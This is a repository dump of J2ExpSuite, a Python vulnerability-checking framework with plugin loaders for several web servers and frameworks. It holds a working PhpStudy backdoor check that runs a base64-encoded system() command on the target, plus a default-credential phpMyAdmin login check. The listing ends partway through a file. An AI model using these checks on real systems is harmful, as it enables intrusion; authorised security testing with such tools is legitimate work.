├── J2ExpSuite.py ├── README.md ├── XXX_POC.py ├── doc ├── Xnip2020-06-11_12-43-27.jpg ├── Xnip2020-06-11_12-43-54.jpg └── Xnip2020-06-11_13-20-35.jpg ├── exphub ├── __init__.py ├── conference │ ├── ConferenceScan.py │ └── __init__.py ├── phpstudy │ ├── PhpStudyDB.py │ ├── PhpStudy_BackDoor.py │ ├── Phpstudy.py │ ├── PhpstudyScan.py │ └── __init__.py ├── shiro │ ├── ShiroScan.py │ └── __init__.py ├── spring │ ├── SpringScan.py │ └── __init__.py ├── struts2 │ ├── StrutsScan.py │ └── __init__.py ├── thinkphp │ ├── ThinkphpScan.py │ └── __init__.py ├── tomcat │ ├── TomcatScan.py │ └── __init__.py └── weblogic │ ├── WeblogicScan.py │ └── __init__.py └── lib ├── Color.py ├── ModelLoad.py ├── Urldeal.py └── __init__.py /J2ExpSuite.py: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | ''' 3 | @Version: V1.0 4 | @Author: JE2Se 5 | @Contact: admin@je2se.com 6 | @Website: https://www.je2se.com 7 | @Github: https://github.com/JE2Se/ 8 | @Time: 2020/6/10 10:53 9 | @File: J2ExpSuite.py 10 | @Desc: 主文件time 11 | ''' 12 | 13 | import sys 14 | from lib import * 15 | from exphub import * 16 | 17 | #程序开始 18 | if __name__ == '__main__': 19 | #判断py版本 20 | if sys.version_info.major < 3: 21 | sys.stdout.write(Vcolors.PURPLE + "J2ExpSuite 仅支持Python 3.x版本~\n" + Vcolors.ENDC) 22 | exit() 23 | #模块部分 24 | import argparse 25 | import pyfiglet 26 | 27 | #头部信息部分 28 | ascii_banner = pyfiglet.figlet_format("J2.ExpSuite") 29 | print(Vcolors.RED + ascii_banner+Vcolors.ENDC) 30 | print(Vcolors.OKBLUE + "\t\t\t\tPower by JE2Se" +" "+ Vcolors.PURPLE + "V1.0" +"\n" +Vcolors.ENDC) 31 | parser = argparse.ArgumentParser() 32 | 33 | #脚本执行帮助部分 34 | print(Vcolors.PURPLE + "\t~请输入 -h 获取命令帮助~" + "\n" + Vcolors.ENDC +Vcolors.OKBLUE) 35 | parser.add_argument("-u" , "--url",type=str, help="填写待测试的URL链接~~(必填)") 36 | parser.add_argument("-s2" , "--struts", help = '添加 -struts 参数,将进行struts漏洞检测 ~~', action='store_true') 37 | parser.add_argument("-wl" , "--weblogic", help = '添加 -weblogic 参数,将进行weblogic漏洞检测 ~~', action='store_true') 38 | parser.add_argument("-tp" , "--thinkphp", help='添加 -thinkphp 参数,将进行ThinkPHP漏洞检测 ~~', action='store_true') 39 | parser.add_argument("-sh" , "--shiro", help='添加 -shiro 参数,将进行Apache Shiro漏洞检测 ~~', action='store_true') 40 | parser.add_argument("-sp" , "--spring", help='添加 -spring 参数,将进行Spring漏洞检测 ~~', action='store_true') 41 | parser.add_argument("-tm" , "--tomcat", help='添加 -tomcat 参数,将进行Tomcat漏洞检测 ~~', action='store_true') 42 | parser.add_argument("-cf" , "--conference", help='添加 -conference 参数,将进行Conference漏洞检测 ~~', action='store_true') 43 | parser.add_argument("-ps", "--phpstudy", help='添加 -phpstudy 参数,将进行PhpStudy后门漏洞检测 ~~', action='store_true') 44 | args = parser.parse_args() 45 | params = vars(args) 46 | 47 | #URL处理 48 | if args.url: 49 | url=args.url 50 | print(Vcolors.BROWN + " 感谢使用J2ExpSuite工具,正在运行,参数分析中......" + Vcolors.ENDC) 51 | print(Vcolors.CYAN + "[+] 待测试的链接为:" + Vcolors.ENDC + Vcolors.RED + url + Vcolors.ENDC) 52 | #导入文件处理簇 53 | if args.struts: 54 | print(Vcolors.CYAN + "[+] 测试模块内容为:" + Vcolors.ENDC + Vcolors.RED +"Struts2漏洞检测" + Vcolors.ENDC) 55 | StrutsScan(url) 56 | if args.weblogic: 57 | print(Vcolors.CYAN + "[+] 测试的模块内容为:" + Vcolors.ENDC + Vcolors.RED +"Weblogic漏洞检测" + Vcolors.ENDC) 58 | WeblogicScan(url) 59 | if args.thinkphp: 60 | print(Vcolors.CYAN + "[+] 测试的模块内容为:" + Vcolors.ENDC + Vcolors.RED +"ThinkPHP漏洞检测" + Vcolors.ENDC) 61 | ThinkphpScan(url) 62 | if args.shiro: 63 | print(Vcolors.CYAN + "[+] 测试的模块内容为:" + Vcolors.ENDC + Vcolors.RED +"Apache Shiro漏洞检测" + Vcolors.ENDC) 64 | ShiroScan(url) 65 | if args.tomcat: 66 | print(Vcolors.CYAN + "[+] 测试的模块内容为:" + Vcolors.ENDC + Vcolors.RED +"Tomcat漏洞检测" + Vcolors.ENDC) 67 | TomcatScan(url) 68 | if args.spring: 69 | print(Vcolors.CYAN + "[+] 测试的模块内容为:" + Vcolors.ENDC + Vcolors.RED +"Spring漏洞检测" + Vcolors.ENDC) 70 | SpringScan(url) 71 | if args.conference: 72 | print(Vcolors.CYAN + "[+] 测试的模块内容为:" + Vcolors.ENDC + Vcolors.RED + "Conference漏洞检测" + Vcolors.ENDC) 73 | ConferenceScan(url) 74 | if args.phpstudy: 75 | print(Vcolors.CYAN + "[+] 测试的模块内容为:" + Vcolors.ENDC + Vcolors.RED + "PhpStudy漏洞检测" + Vcolors.ENDC) 76 | PhpstudyScan(url) 77 | print(Vcolors.CYAN + "[.]-----------扫描结束,感谢使用----------" + Vcolors.ENDC) 78 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # J2ExpSuite 漏洞检测框架V1.0.1 2 | ## 说明 3 | 这是一个以python3编写的的漏洞检测框架,可自定义,添加poc,exp,定向检测,初衷是为了什么呢?我想搞一个全面一点的漏洞检测框架,输入一个url,在选择检测漏洞类型,直接出结果,还要满足POC可集成,简单编写就能加载进去。主要是为了快速的检测漏洞高的存在,POC主要类型为RCE,读文件,注入漏洞,文件上传等类型漏洞,主要为了撕口子。于是我花了一天的时间搞出了这个框架,初步的满足了我的想法,指定参数进行漏洞检测。**添加POC,可直接按照POC编写规范,编写后直接放入对应的文件夹内,无需其他操作,可自行加载配置**。 4 | 5 | {生活}{POC} orz 6 | 7 | 先来几个截图看看工具样子 8 | ## 版本里程碑 9 | 版本 | 更新内容 | 更新时间 10 | -|-|- 11 | V1.0.0|主题框架上传,无POC版|2020年06月1日 12 | V1.0.1|更新部分BUG,简化POC,更新POC编写规范|2020年06月23日 13 | 14 | ## 脚本展示 15 | 16 | ### 脚本启动 17 | ![image-20191128110919811](./doc/Xnip2020-06-11_12-43-27.jpg) 18 | 19 | ## 脚本功能菜单(持续更新中) 20 | ![image-20191128110919812](./doc/Xnip2020-06-11_12-43-54.jpg) 21 | 22 | ## 运行截图 23 | ![image-20191128110919814](./doc/Xnip2020-06-11_13-20-35.jpg) 24 | 25 | 选中某个参数后,程序会自动加载目标参数路径下的所有py脚本,加载后会运行,上面的图片是已phpstudy举例的,加载完后会自动进行检测。 26 | 27 | ## 主题 28 | 老样子,Windows没有皮肤主题,为什么没适配Windows,这是鼓励大家好好的工作,努力赚钱买苹果。 29 | 30 | ## 目前支持漏洞 31 | 32 | 框架/组件/中间件 | 漏洞名称 | 更新时间 33 | -|-|- 34 | Phpstudy | Phpstudy后门漏洞 | 2020年06月11日 35 | ~|默认口令/空口令 | 2020年06月12日 36 | 先这样|POC写完了再|一起放上来~ 37 | 38 | 39 | 之前写的就先删除了,每天更新一个两个的也没意思,我先自己写 40 | 41 | ## POC编写规范 42 | 43 | ### POC格式解析 44 | 45 | ```python 46 | 47 | # encoding: utf-8 48 | from lib import * 49 | import logging 50 | from lib.Urldeal import umethod 51 | 52 | def XXX_POC(Url): #必须与脚本名称相同 53 | scheme, url, port = umethod(Url) 54 | #------------POC部分,按需更改-------------- 55 | try: 56 | urldata = scheme + "://" + url + ':' + str(port) + '/login.action' 57 | if "漏洞判断成功条件": 58 | #------------POC部分,按需更改-------------- 59 | print(Vcolors.RED +"[!] 存在【漏洞名称】漏洞->版本号:什么漏洞\r" + Vcolors.ENDC) 60 | except: 61 | logging.error("【脚本名称】脚本出现异常") 62 | 63 | ``` 64 | 65 | 函数名称需要与脚本名称一致,编写后直接将POC脚本放入对应的路径下就行 66 | ### 新增检查项 67 | 如新添加OA检测 68 | #### 主文件```J2ExpSuite.py``` 69 | 在主文件```J2ExpSuite.py```文件中添加索引 70 | 71 | ```parser.add_argument("-oa", "--oa", help='添加 -oa 参数,将进行OA相关相关漏洞检测 ~~', action='store_true')``` 72 | 73 | 主文件```J2ExpSuite.py```文件中添加执行 74 | ```python 75 | if args.oa: 76 | print(Vcolors.CYAN + "[+] 测试的模块内容为:" + Vcolors.ENDC + Vcolors.RED + "OA相关漏洞检测" + Vcolors.ENDC) 77 | OAScan(url) 78 | ``` 79 | #### 目录 80 | 在exphub内创建oa目录(建议小写统一规范)内部新建```__init__.py```,以及```OAScan.py``` 81 | 82 | #### ```OAScan.py``` 83 | 84 | 先看代码 85 | 86 | ```python 87 | from lib.ModelLoad import ONLoad 88 | from lib import * 89 | import os 90 | import logging 91 | 92 | dlist = [] 93 | #文件遍历 94 | def OAScan(url): #函数名与文件名相同,建议为大写字母加上Scan 95 | for file in os.listdir("./exphub/oa/"): #修改此处为路径名称,建议为小写 96 | if os.path.splitext(file)[1] == '.py': 97 | if os.path.join(file) != "__init__.py" and os.path.join(file) != "OAScan.py": #排除init文件以及主扫描文件OAScan.py文件 98 | dlist.append(os.path.join(os.path.splitext(file)[0])) 99 | ONLoad(dlist) 100 | try: 101 | for defclass in dlist: 102 | print(Vcolors.OKGREEN + "[?] 正在执行" + defclass + "脚本检测.......\r" + Vcolors.ENDC) 103 | exec("from exphub.oa.{0} import {1}".format(defclass, defclass)) #此处修改导入的exphub.路径信息 104 | defclass += "(url)" 105 | exec(defclass) 106 | except: 107 | logging.error("OAScan脚本出现异常") #修改异常监控名称 108 | ``` 109 | 110 | #### ```__init__.py```OA路径 111 | 112 | ```python 113 | from exphub.oa.OAScan import OAScan #导入文件名称,导入函数名称 114 | ``` 115 | #### ```__init__.py```exphub路径 116 | 117 | ```python 118 | from exphub.oa import * #导入函数名称 119 | ``` 120 | 121 | ## 注意 122 | 123 | 没有放pip依赖列表,随运行,随安装吧~(没错,我是真的懒) 124 | 125 | ## 项目地址 126 | 127 | 项目地址:https://github.com/JE2Se/J2ExpSuite 128 | 129 | 我还想白嫖几个star,说不定哪天我更新POC呢~ 130 | 131 | ## 项目愿景 132 | 二期: 133 | 134 | 后期会加入到指纹识别 135 | 136 | 会加入差不多的POC 137 | 138 | # 共同维护 139 | 大家如果有什么好的POC也可以编写玩发送给我,我们共同与维护这个项目 140 | 141 | # 项目支持 142 | 143 | 感谢|以下|人员|对本|程序|的贡|献。 144 | -|-|-|-|-|-|- 145 | 子杰|junsec|Seek 146 | -------------------------------------------------------------------------------- /XXX_POC.py: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | from lib import * 3 | import logging 4 | from lib.Urldeal import umethod 5 | 6 | def XXX_POC(Url): #必须与脚本名称相同 7 | scheme, url, port = umethod(Url) #URL处理,拆分初协议 8 | 9 | #-----------POC部分,下,按需更改-------------------- 10 | urldata = scheme + "://" + url + ':' + str(port) + '/login.action 11 | 12 | try: 13 | if "漏洞判断成功条件": 14 | #-----------POC部分,上,输出部分-------------------- 15 | print(Vcolors.RED +"[!] 存在【漏洞名称】漏洞->版本号:什么漏洞\r" + Vcolors.ENDC) 16 | except: 17 | logging.error("【脚本名称】脚本出现异常") 18 | -------------------------------------------------------------------------------- /doc/Xnip2020-06-11_12-43-27.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JE2Se/J2ExpSuite/232d08fe1e274e328bbb8f3e982040f7ba4b4a72/doc/Xnip2020-06-11_12-43-27.jpg -------------------------------------------------------------------------------- /doc/Xnip2020-06-11_12-43-54.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JE2Se/J2ExpSuite/232d08fe1e274e328bbb8f3e982040f7ba4b4a72/doc/Xnip2020-06-11_12-43-54.jpg -------------------------------------------------------------------------------- /doc/Xnip2020-06-11_13-20-35.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JE2Se/J2ExpSuite/232d08fe1e274e328bbb8f3e982040f7ba4b4a72/doc/Xnip2020-06-11_13-20-35.jpg -------------------------------------------------------------------------------- /exphub/__init__.py: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | ''' 3 | @Version: V1.0 4 | @Author: JE2Se 5 | @Contact: admin@je2se.com 6 | @Website: https://www.je2se.com 7 | @Github: https://github.com/JE2Se/ 8 | @Time: 2020/6/10 12:36 9 | @File: __init__.py.py 10 | @Desc: 11 | ''' 12 | from exphub.struts2 import * 13 | from exphub.thinkphp import * 14 | from exphub.weblogic import * 15 | from exphub.shiro import * 16 | from exphub.spring import * 17 | from exphub.conference import * 18 | from exphub.tomcat import * 19 | from exphub.phpstudy import * 20 | 21 | -------------------------------------------------------------------------------- /exphub/conference/ConferenceScan.py: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | ''' 3 | @Version: V1.0 4 | @Author: JE2Se 5 | @Contact: admin@je2se.com 6 | @Website: https://www.je2se.com 7 | @Github: https://github.com/JE2Se/ 8 | @Time: 2020/6/10 18:28 9 | @File: ConferenceScan.py 10 | @Desc: 11 | ''' 12 | 13 | from lib.ModelLoad import ONLoad 14 | from lib import * 15 | import os 16 | import logging 17 | 18 | dlist = [] 19 | #文件遍历 20 | def ConferenceScan(url): 21 | for file in os.listdir("./exphub/conference/"): 22 | if os.path.splitext(file)[1] == '.py': 23 | if os.path.join(file) != "__init__.py" and os.path.join(file) != "ConferenceScan.py": 24 | dlist.append(os.path.join(os.path.splitext(file)[0])) 25 | ONLoad(dlist) 26 | try: 27 | for defclass in dlist: 28 | print(Vcolors.OKGREEN + "[?] 正在执行" + defclass + "脚本检测.......\r" + Vcolors.ENDC) 29 | exec("from exphub.conference.{0} import {1}".format(defclass, defclass)) 30 | defclass += "(url)" 31 | exec(defclass) 32 | except: 33 | logging.error("ConferenceScan脚本出现异常") -------------------------------------------------------------------------------- /exphub/conference/__init__.py: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | ''' 3 | @Version: V1.0 4 | @Author: JE2Se 5 | @Contact: admin@je2se.com 6 | @Website: https://www.je2se.com 7 | @Github: https://github.com/JE2Se/ 8 | @Time: 2020/6/10 12:22 9 | @File: __init__.py.py 10 | @Desc: 自加载文件 11 | ''' 12 | 13 | from exphub.conference.ConferenceScan import ConferenceScan -------------------------------------------------------------------------------- /exphub/phpstudy/PhpStudyDB.py: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | ''' 3 | @Version: V1.0 4 | @Author: JE2Se 5 | @Contact: admin@je2se.com 6 | @Website: https://www.je2se.com 7 | @Github: https://github.com/JE2Se/ 8 | @Time: 2020/6/10 19:25 9 | @File: PhpStudyDB.py 10 | @Desc: 11 | ''' 12 | 13 | from lib import * 14 | import logging 15 | from lib.Urldeal import umethod 16 | import requests 17 | 18 | def PhpStudyDB(Url): #必须与脚本名称相同 19 | scheme, url, port = umethod(Url) 20 | try: 21 | payload_url = scheme + "://" + url + ':' + str(port) + "/phpmyadmin/index.php" 22 | headers = { 23 | 'Accept-Encoding': 'gzip, deflate', 24 | 'Accept': '*/*', 25 | "Content-Type": "application/x-www-form-urlencoded", 26 | 'User-Agent':"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:49.0) Gecko/20100101 Firefox/49.0", 27 | } 28 | post_data = { 29 | "pma_username": "root", 30 | "pma_password": "root", 31 | "server": "1", 32 | "target": "index.php" 33 | } 34 | post_data1 = { 35 | "pma_username": "root", 36 | "pma_password": "", 37 | "server": "1", 38 | "target": "index.php" 39 | } 40 | s = requests.session() 41 | resp = s.post(payload_url, data=post_data, headers=headers, timeout=5, verify=False) 42 | resp2 = s.get(payload_url, headers=headers, timeout=5, verify=False) 43 | con = resp.text 44 | con2 = resp2.text 45 | if con2.lower().find('navigation.php') != -1 and con.lower().find('frame_navigation') != -1: 46 | print(Vcolors.RED +"[!] 存在PhpStudy默认数据库界面口令漏洞,默认口令root/root\r" + Vcolors.ENDC) 47 | else: 48 | resp = s.post(payload_url, data=post_data1, headers=headers, timeout=5, verify=False) 49 | resp2 = s.get(payload_url, headers=headers, timeout=5, verify=False) 50 | con = resp.text 51 | con2 = resp2.text 52 | if con2.lower().find('navigation.php') != -1 and con.lower().find('frame_navigation') != -1: 53 | print(Vcolors.RED + "[!] 存在PhpStudy默认数据库界面口令漏洞,默认口令root/空\r" + Vcolors.ENDC) 54 | except: 55 | logging.error("PhpStudyDB脚本出现异常") -------------------------------------------------------------------------------- /exphub/phpstudy/PhpStudy_BackDoor.py: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | ''' 3 | @Version: V1.0 4 | @Author: JE2Se 5 | @Contact: admin@je2se.com 6 | @Website: https://www.je2se.com 7 | @Github: https://github.com/JE2Se/ 8 | @Time: 2020/6/10 18:56 9 | @File: PhpStudy_BackDoor.py 10 | @Desc: PHPStudy后门漏洞 11 | ''' 12 | 13 | from lib import * 14 | import logging 15 | from lib.Urldeal import umethod 16 | import requests 17 | 18 | def PhpStudy_BackDoor(Url): 19 | scheme, url, port = umethod(Url) 20 | urldata = scheme + "://" + url + ':' + str(port) + '/' 21 | header = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:49.0) Gecko/20100101 Firefox/49.0", 22 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", 23 | "Accept-Language": "zh-CN", 24 | "Accept-Encoding": "gzip,deflate", 25 | "X-Forwarded-For": "8.8.8.8", 26 | "Connection": "close", 27 | "Accept-charset": "c3lzdGVtKCdlY2hvIEpFMlNlSnVzdFRydXN0bWUnKSA7", 28 | "Upgrade-Insecure-Requests": "1"} 29 | try: 30 | requests.packages.urllib3.disable_warnings() 31 | a = requests.get(urldata, headers=header, timeout=5, verify=False) 32 | if "JE2SeJustTrustme" in a.text: 33 | print(Vcolors.RED + "[!] 存在PhpStudy后门漏洞\r" + Vcolors.ENDC) 34 | except Exception as e : 35 | logging.error("PhpStudy_BackDoor脚本出现异常") -------------------------------------------------------------------------------- /exphub/phpstudy/Phpstudy.py: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | ''' 3 | @Version: V1.0 4 | @Author: JE2Se 5 | @Contact: admin@je2se.com 6 | @Website: https://www.je2se.com 7 | @Github: https://github.com/JE2Se/ 8 | @Time: 2020/6/10 18:28 9 | @File: PhpstudyScan.py 10 | @Desc: 11 | ''' 12 | 13 | from lib.ModelLoad import ONLoad 14 | from lib import * 15 | import os 16 | import logging 17 | 18 | dlist = [] 19 | #文件遍历 20 | def PhpstudyScan(url): 21 | for file in os.listdir("./exphub/phpstudy/"): 22 | if os.path.splitext(file)[1] == '.py': 23 | if os.path.join(file) != "__init__.py" and os.path.join(file) != "PhpstudyScan.py": 24 | dlist.append(os.path.join(os.path.splitext(file)[0])) 25 | ONLoad(dlist) 26 | try: 27 | for defclass in dlist: 28 | print(Vcolors.OKGREEN + "[?] 正在执行" + defclass + "脚本检测.......\r" + Vcolors.ENDC) 29 | defclass += "({})".format(url) 30 | exec(defclass) 31 | except: 32 | logging.error("PhpstudyScan脚本出现异常") -------------------------------------------------------------------------------- /exphub/phpstudy/PhpstudyScan.py: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | ''' 3 | @Version: V1.0 4 | @Author: JE2Se 5 | @Contact: admin@je2se.com 6 | @Website: https://www.je2se.com 7 | @Github: https://github.com/JE2Se/ 8 | @Time: 2020/6/10 18:28 9 | @File: PhpstudyScan.py 10 | @Desc: 11 | ''' 12 | 13 | from lib.ModelLoad import ONLoad 14 | from lib import * 15 | import os 16 | import logging 17 | 18 | dlist = [] 19 | #文件遍历 20 | def PhpstudyScan(url): 21 | for file in os.listdir("./exphub/phpstudy/"): 22 | if os.path.splitext(file)[1] == '.py': 23 | if os.path.join(file) != "__init__.py" and os.path.join(file) != "PhpstudyScan.py": 24 | dlist.append(os.path.join(os.path.splitext(file)[0])) 25 | ONLoad(dlist) 26 | try: 27 | for defclass in dlist: 28 | print(Vcolors.OKGREEN + "[?] 正在执行" + defclass + "脚本检测.......\r" + Vcolors.ENDC) 29 | exec("from exphub.phpstudy.{0} import {1}".format(defclass,defclass)) 30 | defclass += "(url)" 31 | exec(defclass) 32 | except: 33 | logging.error("PhpstudyScan脚本出现异常") -------------------------------------------------------------------------------- /exphub/phpstudy/__init__.py: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | ''' 3 | @Version: V1.0 4 | @Author: JE2Se 5 | @Contact: admin@je2se.com 6 | @Website: https://www.je2se.com 7 | @Github: https://github.com/JE2Se/ 8 | @Time: 2020/6/10 12:22 9 | @File: __init__.py.py 10 | @Desc: 自加载文件 11 | ''' 12 | 13 | from exphub.phpstudy.Phpstudy import PhpstudyScan -------------------------------------------------------------------------------- /exphub/shiro/ShiroScan.py: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | ''' 3 | @Version: V1.0 4 | @Author: JE2Se 5 | @Contact: admin@je2se.com 6 | @Website: https://www.je2se.com 7 | @Github: https://github.com/JE2Se/ 8 | @Time: 2020/6/10 18:28 9 | @File: ConferenceScan.py 10 | @Desc: 11 | ''' 12 | 13 | from lib.ModelLoad import ONLoad 14 | from lib import * 15 | import os 16 | import logging 17 | 18 | dlist = [] 19 | #文件遍历 20 | def ShiroScan(url): 21 | for file in os.listdir("./exphub/shiro/"): 22 | if os.path.splitext(file)[1] == '.py': 23 | if os.path.join(file) != "__init__.py" and os.path.join(file) != "ShiroScan.py": 24 | dlist.append(os.path.join(os.path.splitext(file)[0])) 25 | ONLoad(dlist) 26 | try: 27 | for defclass in dlist: 28 | print(Vcolors.OKGREEN + "[?] 正在执行" + defclass + "脚本检测.......\r" + Vcolors.ENDC) 29 | exec("from exphub.shiro.{0} import {1}".format(defclass, defclass)) 30 | defclass += "(url)" 31 | exec(defclass) 32 | except: 33 | logging.error("ShiroScan脚本出现异常") -------------------------------------------------------------------------------- /exphub/shiro/__init__.py: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | ''' 3 | @Version: V1.0 4 | @Author: JE2Se 5 | @Contact: admin@je2se.com 6 | @Website: https://www.je2se.com 7 | @Github: https://github.com/JE2Se/ 8 | @Time: 2020/6/10 12:22 9 | @File: __init__.py.py 10 | @Desc: 自加载文件 11 | ''' 12 | 13 | from exphub.shiro.ShiroScan import ShiroScan -------------------------------------------------------------------------------- /exphub/spring/SpringScan.py: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | ''' 3 | @Version: V1.0 4 | @Author: JE2Se 5 | @Contact: admin@je2se.com 6 | @Website: https://www.je2se.com 7 | @Github: https://github.com/JE2Se/ 8 | @Time: 2020/6/10 18:28 9 | @File: ConferenceScan.py 10 | @Desc: 11 | ''' 12 | 13 | from lib.ModelLoad import ONLoad 14 | from lib import * 15 | import os 16 | import logging 17 | 18 | dlist = [] 19 | #文件遍历 20 | def SpringScan(url): 21 | for file in os.listdir("./exphub/spring/"): 22 | if os.path.splitext(file)[1] == '.py': 23 | if os.path.join(file) != "__init__.py" and os.path.join(file) != "SpringScan.py": 24 | dlist.append(os.path.join(os.path.splitext(file)[0])) 25 | ONLoad(dlist) 26 | try: 27 | for defclass in dlist: 28 | print(Vcolors.OKGREEN + "[?] 正在执行" + defclass + "脚本检测.......\r" + Vcolors.ENDC) 29 | exec("from exphub.spring.{0} import {1}".format(defclass, defclass)) 30 | defclass += "(url)" 31 | exec(defclass) 32 | except: 33 | logging.error("SpringScan脚本出现异常") -------------------------------------------------------------------------------- /exphub/spring/__init__.py: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | ''' 3 | @Version: V1.0 4 | @Author: JE2Se 5 | @Contact: admin@je2se.com 6 | @Website: https://www.je2se.com 7 | @Github: https://github.com/JE2Se/ 8 | @Time: 2020/6/10 12:22 9 | @File: __init__.py.py 10 | @Desc: 自加载文件 11 | ''' 12 | 13 | from exphub.spring.SpringScan import SpringScan -------------------------------------------------------------------------------- /exphub/struts2/StrutsScan.py: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | ''' 3 | @Version: V1.0 4 | @Author: JE2Se 5 | @Contact: admin@je2se.com 6 | @Website: https://www.je2se.com 7 | @Github: https://github.com/JE2Se/ 8 | @Time: 2020/6/10 12:39 9 | @File: StrutsScan.py 10 | @Desc: 11 | ''' 12 | from lib.ModelLoad import ONLoad 13 | from lib import * 14 | import os 15 | import logging 16 | 17 | dlist = [] 18 | #文件遍历 19 | def StrutsScan(url): 20 | for file in os.listdir("./exphub/struts2/"): 21 | if os.path.splitext(file)[1] == '.py': 22 | if os.path.join(file) != "__init__.py" and os.path.join(file) != "StrutsScan.py": 23 | dlist.append(os.path.join(os.path.splitext(file)[0])) 24 | ONLoad(dlist) 25 | try: 26 | for defclass in dlist: 27 | print(Vcolors.OKGREEN + "[?] 正在执行" + defclass + "脚本检测.......\r" + Vcolors.ENDC) 28 | exec("from exphub.struts2.{0} import {1}".format(defclass, defclass)) 29 | defclass += "(url)" 30 | exec(defclass) 31 | 32 | except: 33 | logging.error("StrutsScan脚本出现异常") -------------------------------------------------------------------------------- /exphub/struts2/__init__.py: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | ''' 3 | @Version: V1.0 4 | @Author: JE2Se 5 | @Contact: admin@je2se.com 6 | @Website: https://www.je2se.com 7 | @Github: https://github.com/JE2Se/ 8 | @Time: 2020/6/10 12:22 9 | @File: __init__.py.py 10 | @Desc: 自加载文件 11 | ''' 12 | 13 | from exphub.struts2.StrutsScan import StrutsScan -------------------------------------------------------------------------------- /exphub/thinkphp/ThinkphpScan.py: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | ''' 3 | @Version: V1.0 4 | @Author: JE2Se 5 | @Contact: admin@je2se.com 6 | @Website: https://www.je2se.com 7 | @Github: https://github.com/JE2Se/ 8 | @Time: 2020/6/10 18:28 9 | @File: ConferenceScan.py 10 | @Desc: 11 | ''' 12 | 13 | from lib.ModelLoad import ONLoad 14 | from lib import * 15 | import os 16 | import logging 17 | 18 | dlist = [] 19 | #文件遍历 20 | def ThinkphpScan(url): 21 | for file in os.listdir("./exphub/thinkphp/"): 22 | if os.path.splitext(file)[1] == '.py': 23 | if os.path.join(file) != "__init__.py" and os.path.join(file) != "ThinkphpScan.py": 24 | dlist.append(os.path.join(os.path.splitext(file)[0])) 25 | ONLoad(dlist) 26 | try: 27 | for defclass in dlist: 28 | print(Vcolors.OKGREEN + "[?] 正在执行" + defclass + "脚本检测.......\r" + Vcolors.ENDC) 29 | exec("from exphub.thinkphp.{0} import {1}".format(defclass, defclass)) 30 | defclass += "(url)" 31 | exec(defclass) 32 | except: 33 | logging.error("ThinkphpScan脚本出现异常") -------------------------------------------------------------------------------- /exphub/thinkphp/__init__.py: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | ''' 3 | @Version: V1.0 4 | @Author: JE2Se 5 | @Contact: admin@je2se.com 6 | @Website: https://www.je2se.com 7 | @Github: https://github.com/JE2Se/ 8 | @Time: 2020/6/10 12:22 9 | @File: __init__.py.py 10 | @Desc: 自加载文件 11 | ''' 12 | 13 | from exphub.thinkphp.ThinkphpScan import ThinkphpScan -------------------------------------------------------------------------------- /exphub/tomcat/TomcatScan.py: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | ''' 3 | @Version: V1.0 4 | @Author: JE2Se 5 | @Contact: admin@je2se.com 6 | @Website: https://www.je2se.com 7 | @Github: https://github.com/JE2Se/ 8 | @Time: 2020/6/10 18:28 9 | @File: ConferenceScan.py 10 | @Desc: 11 | ''' 12 | 13 | from lib.ModelLoad import ONLoad 14 | from lib import * 15 | import os 16 | import logging 17 | 18 | dlist = [] 19 | #文件遍历 20 | def TomcatScan(url): 21 | for file in os.listdir("./exphub/tomcat/"): 22 | if os.path.splitext(file)[1] == '.py': 23 | if os.path.join(file) != "__init__.py" and os.path.join(file) != "TomcatScan.py": 24 | dlist.append(os.path.join(os.path.splitext(file)[0])) 25 | ONLoad(dlist) 26 | try: 27 | for defclass in dlist: 28 | print(Vcolors.OKGREEN + "[?] 正在执行" + defclass + "脚本检测.......\r" + Vcolors.ENDC) 29 | exec("from exphub.tomcat.{0} import {1}".format(defclass, defclass)) 30 | defclass += "(url)" 31 | exec(defclass) 32 | except: 33 | logging.error("TomcatScan脚本出现异常") -------------------------------------------------------------------------------- /exphub/tomcat/__init__.py: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | ''' 3 | @Version: V1.0 4 | @Author: JE2Se 5 | @Contact: admin@je2se.com 6 | @Website: https://www.je2se.com 7 | @Github: https://github.com/JE2Se/ 8 | @Time: 2020/6/10 12:22 9 | @File: __init__.py.py 10 | @Desc: 自加载文件 11 | ''' 12 | 13 | from exphub.tomcat.TomcatScan import TomcatScan -------------------------------------------------------------------------------- /exphub/weblogic/WeblogicScan.py: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | ''' 3 | @Version: V1.0 4 | @Author: JE2Se 5 | @Contact: admin@je2se.com 6 | @Website: https://www.je2se.com 7 | @Github: https://github.com/JE2Se/ 8 | @Time: 2020/6/10 18:28 9 | @File: ConferenceScan.py 10 | @Desc: 11 | ''' 12 | 13 | from lib.ModelLoad import ONLoad 14 | from lib import * 15 | import os 16 | import logging 17 | 18 | dlist = [] 19 | #文件遍历 20 | def WeblogicScan(url): 21 | for file in os.listdir("./exphub/weblogic/"): 22 | if os.path.splitext(file)[1] == '.py': 23 | if os.path.join(file) != "__init__.py" and os.path.join(file) != "WeblogicScan.py": 24 | dlist.append(os.path.join(os.path.splitext(file)[0])) 25 | 